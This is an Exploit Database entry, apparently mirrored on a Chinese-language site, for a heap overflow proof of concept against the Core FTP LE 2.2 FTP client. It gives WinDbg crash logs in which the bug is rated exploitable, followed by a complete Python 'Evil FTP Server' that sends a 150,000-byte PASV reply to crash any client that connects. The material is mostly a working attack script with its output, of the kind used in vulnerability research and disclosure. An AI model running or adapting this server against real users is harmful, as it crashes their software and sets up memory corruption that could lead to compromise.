Core FTP LE 2.2 – Heap Overflow (PoC)

• Exploit Database
• 130 阅读

• 作者： Gabor Seljan
  日期： 2014-06-11
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33713/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122

  #-----------------------------------------------------------------------------# # Exploit Title: Core FTP LE 2.2 - Heap Overflow PoC# # Date: Jun 11 2014 # # Exploit Author: Gabor Seljan# # Software Link: http://www.coreftp.com/# # Version: 2.2 build 1798 # # Tested on: Windows XP SP3 # #-----------------------------------------------------------------------------#   # In some cases the client does not do proper bounds checking on server # responses. An overly long reply from the server causes a heap overflow and # crashes the application. The USER, PASS, PASV, SYST, PWD, CDUP commands are # all vulnerable and possibly other commands are too.   ''' HEAP[coreftp.exe]: Heap block at 00F17BC8 modified at 00F1BBD1 past requested size of 4001 (9d8.9f4): Break instruction exception - code 80000003 (first chance) eax=00f17bc8 ebx=00f1bbd1 ecx=7c91eab5 edx=015295ab esi=00f17bc8 edi=00004001 eip=7c90120e esp=015297ac ebp=015297b0 iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202 ntdll!DbgBreakPoint: 7c90120e ccint 3 0:002> dd eax 00f17bc8004b0804 011f0733 20373232 41414141 00f17bd841414141 41414141 41414141 41414141 00f17be841414141 41414141 41414141 41414141 00f17bf841414141 41414141 41414141 41414141 00f17c0841414141 41414141 41414141 41414141 00f17c1841414141 41414141 41414141 41414141 00f17c2841414141 41414141 41414141 41414141 00f17c3841414141 41414141 41414141 41414141 0:002> g HEAP[coreftp.exe]: Invalid Address specified to RtlFreeHeap( 00C10000, 00F17BD0 ) (9d8.9f4): Break instruction exception - code 80000003 (first chance) eax=00f17bc8 ebx=00f17bc8 ecx=7c91eab5 edx=015295ba esi=00c10000 edi=00f17bc8 eip=7c90120e esp=015297c4 ebp=015297c8 iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202 ntdll!DbgBreakPoint: 7c90120e ccint 3 0:002> g (9d8.9f4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00f3bff0 ebx=00000000 ecx=41414141 edx=00f1bbf0 esi=00f3bfe8 edi=00c10000 eip=7c9276dc esp=01529704 ebp=015297d8 iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 ntdll!RtlOemStringToUnicodeString+0x277: 7c9276dc 8901mov dword ptr [ecx],eaxds:0023:41414141=???????? 0:002> !exploitable Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlOemStringToUnicodeString+0x0000000000000277 (Hash=0x72683756.0x417d7f55)   User mode write access violations that are not near NULL are exploitable. (b58.cf0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00f1bbf0 ebx=41414141 ecx=00004141 edx=00c10608 esi=00f1bbe8 edi=41414141 eip=7c919064 esp=0152d30c ebp=0152d528 iopl=0 nv up ei pl nz ac po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010212 ntdll!RtlDosSearchPath_Ustr+0x473: 7c919064 8b0bmov ecx,dword ptr [ebx]ds:0023:41414141=???????? 0:002> dd eax 00f1bbf041414141 41414141 41414141 41414141 00f1bc0041414141 41414141 41414141 41414141 00f1bc1041414141 41414141 41414141 41414141 00f1bc2041414141 41414141 41414141 41414141 00f1bc3041414141 41414141 41414141 41414141 00f1bc4041414141 41414141 41414141 41414141 00f1bc5041414141 41414141 41414141 41414141 00f1bc6041414141 41414141 41414141 41414141 0:002> dd esi 00f1bbe841414141 41414141 41414141 41414141 00f1bbf841414141 41414141 41414141 41414141 00f1bc0841414141 41414141 41414141 41414141 00f1bc1841414141 41414141 41414141 41414141 00f1bc2841414141 41414141 41414141 41414141 00f1bc3841414141 41414141 41414141 41414141 00f1bc4841414141 41414141 41414141 41414141 00f1bc5841414141 41414141 41414141 41414141 '''   #!/usr/bin/python   from socket import *   host = "0.0.0.0" port = 21 payload = "A" * 150000   s = socket(AF_INET, SOCK_STREAM) s.bind((host, 21)) s.listen(1)   print "[+] Evil FTP Server started" print "[+] Listening on port %d..." % port   conn, addr = s.accept() print "[+] Connection accepted from %s" % addr[0] conn.send("220 Welcome to Evil FTP Server\r\n") conn.recv(1024)# Receive USER conn.send("331 Need password for whatever user\r\n") conn.recv(1024)# Receive PASS conn.send("230 User logged in\r\n") conn.recv(1024)# Receive SYST conn.send("215 UNIX Type: L8\r\n") conn.recv(1024)# Receive PWD conn.send("257 \"/\" is current directory\r\n")   try: print "[+] Sending evil response for 'PASV' command..." conn.recv(1024)# Receive PASV conn.send("227 "+payload+"\r\n") conn.recv(1024) except error as e: if e.errno == 10054: print "[+] Client crashed!" else: print e finally: conn.close() s.close()